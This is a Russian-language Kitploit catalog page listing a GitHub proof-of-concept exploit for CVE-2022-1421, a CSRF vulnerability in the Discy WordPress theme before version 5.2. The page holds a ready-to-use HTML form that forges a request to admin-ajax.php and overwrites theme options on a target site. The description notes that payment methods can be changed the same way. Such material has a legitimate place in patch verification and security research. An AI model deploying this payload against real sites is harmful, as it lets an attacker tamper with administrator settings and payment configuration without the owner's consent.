Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1421 — Доказательство концепции эксплуатации для CVE-2022-1421, уязвимости CSRF в теме Discy для WordPress, позволяющей изменять настройки администратора с помощью специально созданных AJAX-запросов. | Kitploit
Инструменты/GitHubGitHub/nb1b3k/cve-2022-1421
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnb1b3k/cve-2022-1421

CVE-2022-1421

Доказательство концепции эксплуатации для CVE-2022-1421, уязвимости CSRF в теме Discy для WordPress, позволяющей изменять настройки администратора с помощью специально созданных AJAX-запросов.

Репозиторий
733 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-1421

Концепт-эксплойт для CVE-2022-1421

Discy < 5.2 - Обновление настроек через CSRF

В Discy < 5.2 отсутствуют проверки CSRF в некоторых AJAX-действиях, что позволяет атакующему заставить вошедшего в систему администратора изменить произвольные настройки плагина, включая платёжные методы, с помощью CSRF-атаки.

Затронутая тема

Discy < 5.2

POC

<html>
  <body>
    <form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html> 

Ссылки

https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421

Скачать инструмент